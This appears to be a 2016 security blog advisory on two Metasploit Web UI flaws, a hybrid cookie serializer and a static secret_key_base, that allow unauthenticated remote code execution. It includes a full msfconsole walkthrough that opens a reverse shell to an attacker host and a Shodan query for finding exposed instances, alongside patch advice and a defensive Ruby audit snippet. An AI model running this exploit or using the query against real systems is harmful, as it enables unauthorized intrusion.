
Sep 21 2016

Metasploit deserialization vulnerability: remote unauthenticated code execution (with exploit, updated 9/21 06:00)


The description of the 4.12.0-2016091401 patch [0] that Rapid7 released this week mentions two vulnerabilities. Combined, they let a remote attacker execute arbitrary code on a Metasploit product without authentication. Researchers have since also published PoC attack code [1].

PS: the patch and PoC are listed in the reference documents at the end of the article.


Vulnerability 1: Metasploit Web UI's config.action_dispatch.cookies_serializer is set to :hybrid


OVE ID: OVE-20160904-0001

Private disclosure date: 2016-09-04

Public disclosure date: 2016-09-19

Vendor advisory: https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401

Affected versions: Metasploit 4.12.0-2016061501 to 4.12.0-2016083001


A Rails application accepts a signed cookie to carry the session. Before Rails 4.1 the session was serialized with Marshal, whose deserialization can instantiate arbitrary objects. Rails 4.1 introduced JSON cookie serialization, which by default cannot instantiate arbitrary objects and is considerably safer. Rails 4.1 also introduced the 'hybrid' cookie serializer, which deserializes both JSON- and Marshal-serialized cookies. When the cookie serializer is set to Marshal or hybrid, a remote attacker who knows the cookie signing key can forge a session cookie that triggers Marshal deserialization and achieves arbitrary code execution.


In the Metasploit Community, Express and Pro editions, the Web UI set config.action_dispatch.cookies_serializer to :hybrid in every build before Metasploit 4.12.0-2016091401; only 4.12.0-2016091401 changed the value to :json. Users therefore need to update to Metasploit 4.12.0-2016091401 or later to be protected against this vulnerability.


References:

[0] http://blog.bigbinary.com/2014/12/23/migrating-existing-session-cookies-while-upgrading-to-rails-4-1-and-above.html

[1] https://www.rapid7.com/db/modules/exploit/multi/http/rails_secret_deserialization



漏洞2:Metasploit Weekly Release Static secret_key_base pre-auth RCE


OVE ID: OVE-20160904-0002

Private disclosure date: 2016-09-04

Public disclosure date: 2016-09-19

Vendor advisory: https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401

Affected versions: Metasploit 4.12.0-2016061501 to 4.12.0-2016083001


In the Metasploit Community, Express and Pro editions, the Web UI's secret_key_base is a fixed, publicly known value, and Metasploit's config.action_dispatch.cookies_serializer defaults to :hybrid. Together these let a remote, unauthenticated attacker craft cookies that deserialize arbitrary Marshal objects and execute arbitrary commands as the daemon user on the machine running Metasploit.

A known, fixed secret_key_base value exists for each affected weekly release (4.12.0-2016061501 through 4.12.0-2016083001, plus one unreleased build).



Security researchers have already developed a module that attacks Metasploit itself; its path is
exploit/multi/http/rails_secret_deserialization
Usage is as follows:
 
msf exploit(metasploit_static_secret_key_base) > info
       Name: Metasploit Web UI Static secret_key_base Value
     Module: exploit/multi/http/metasploit_static_secret_key_base
   Platform: Ruby Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-09-15
Provided by:
  Justin Steven
  joernchen of Phenoelit <[email protected]>
Available targets:
  Id  Name
  --  ----
  0   Metasploit 4.12.0-2016061501 to 4.12.0-2016083001
Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      3790             yes       The target port
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The path to the Metasploit Web UI
  VHOST                       no        HTTP server virtual host
Payload information:
Description:
  This module exploits the Web UI for Metasploit Community, Express
  and Pro where one of a certain set of Weekly Releases have been
  applied. These Weekly Releases introduced a static secret_key_base
  value. Knowledge of the static secret_key_base value allows for
  deserialization of a crafted Ruby Object, achieving code execution.
  This module is based on
  exploits/multi/http/rails_secret_deserialization
References:
  OVE (20160904-0002)
  https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401
msf exploit(metasploit_static_secret_key_base) > set RHOST 172.18.0.2
RHOST => 172.18.0.2
msf exploit(metasploit_static_secret_key_base) > set PAYLOAD ruby/shell_reverse_tcp
PAYLOAD => ruby/shell_reverse_tcp
msf exploit(metasploit_static_secret_key_base) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(metasploit_static_secret_key_base) > set LPORT 4444
LPORT => 4444
msf exploit(metasploit_static_secret_key_base) > exploit
[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Checking for cookie _ui_session
[*] Searching for proper SECRET
[*] Sending cookie _ui_session
[*] Command shell session 1 opened (172.18.0.1:4444 -> 172.18.0.2:47590) at 2016-09-19 19:26:30 +1000
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
exit
^C
Abort session 1? [y/N]  y
[*] 172.18.0.2 - Command shell session 1 closed.  Reason: User exit


Rapid7 fixed this problem in Metasploit 4.12.0-2016091401: the product now checks whether secret_key_base is the default value and, if it is, regenerates it. Users should therefore upgrade to Metasploit 4.12.0-2016091401 or later as soon as possible.
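As an added example (not code from the original post, from Rapid7, or from the Metasploit module shown above), the following Ruby implements the defender-side checks that both vulnerabilities and the fix call for: whether a Rails initializer sets cookies_serializer to :json, whether the running secret_key_base matches a known static value (regenerating it the way the fixed release does), and whether a verified session payload is Marshal- or JSON-encoded. KNOWN_STATIC_KEYS and the two initializer strings are constructed placeholders, not the real values.

```ruby
require 'json'
require 'securerandom'

# Added example (not code from the original post or from Rapid7) showing the
# defender-side checks the advisory implies: is the cookie serializer :json,
# and is secret_key_base one of the published static values?
# KNOWN_STATIC_KEYS is a placeholder; fill it from the vendor advisory.
KNOWN_STATIC_KEYS = %w[PLACEHOLDER_STATIC_KEY_FROM_ADVISORY].freeze

# Audit a Rails initializer (as text) plus the secret_key_base the app runs with.
# Returns an array of finding strings; an empty array means both settings look safe.
def audit_rails_config(initializer_text, secret_key_base)
  findings = []
  if initializer_text =~ /cookies_serializer\s*=\s*:(\w+)/
    serializer = Regexp.last_match(1)
    unless serializer == 'json'
      findings << "cookies_serializer is :#{serializer}; Marshal payloads are accepted, set :json"
    end
  else
    findings << 'cookies_serializer is not set explicitly; set :json'
  end
  if KNOWN_STATIC_KEYS.include?(secret_key_base)
    findings << 'secret_key_base matches a known static value; regenerate it'
  end
  findings
end

# What the fixed release does on detection: replace a static key with a fresh
# 128-hex-character secret (the same size `rake secret` produces).
def regenerate_if_static(secret_key_base)
  KNOWN_STATIC_KEYS.include?(secret_key_base) ? SecureRandom.hex(64) : secret_key_base
end

# Classify the raw session payload a serializer would be handed, i.e. the cookie
# body after signature verification (and decryption, for encrypted cookies).
# Marshal streams begin with the version bytes 0x04 0x08; JSON begins with '{'.
# A :marshal result arriving at a :hybrid app is the condition to alert on.
def session_payload_format(payload)
  bytes = payload.b
  return :marshal if bytes.byteslice(0, 2) == "\x04\x08".b
  return :json if bytes.lstrip.start_with?('{')
  :unknown
end

# Constructed sample initializer lines: the vulnerable setting and the fixed one.
VULNERABLE_INITIALIZER = "Rails.application.config.action_dispatch.cookies_serializer = :hybrid\n".freeze
FIXED_INITIALIZER      = "Rails.application.config.action_dispatch.cookies_serializer = :json\n".freeze
```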


References:

[0] https://github.com/rapid7/metasploit-framework/pull/7304

[1] https://github.com/rapid7/metasploit-framework/pull/7341


Update:


Metasploit instances exposed to the internet can be found on Shodan with the keyword

title:"metasploit is initializing"

(updated 2016/9/21 09:00)


Tags: Metasploit vulnerability

Copyright notice: unless otherwise stated, this article is original work by mOon; please keep the source attribution when reposting.
